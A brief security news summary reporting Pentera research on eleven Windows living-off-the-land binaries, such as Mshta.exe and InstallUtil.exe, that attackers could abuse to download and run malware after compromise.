"LOLBAS in the Wild: 11 Living-Off-The-Land Binaries That Could Be Used for Malicious Purposes"
Researchers have found 11 living-off-the-land binaries and scripts (LOLBAS) that threat actors could exploit to conduct post-exploitation activities. Nir Chako, a security researcher at Pentera, describes LOLBAS as an attack technique involving using binaries and scripts that are already part of the system for malicious purposes. Since they are all performed by trusted system utilities, it is difficult for security teams to distinguish between legitimate and malicious activities. The cybersecurity company reported discovering nine LOLBAS downloaders and three executors that enable adversaries to download and execute "more robust malware" on infected hosts. The discovered LOLBAS downloaders and executors include MsoHtmEd.exe, Mspub.exe, ProtocolHandler.exe, ConfigSecurityPolicy.exe, InstallUtil.exe, Mshta.exe, Presentationhost.exe, Outlook.exe, MSAccess.exe, scp.exe, and sftp.exe. This article continues to discuss the LOLBAS downloaders and executors that threat actors could abuse for post-exploitation activities.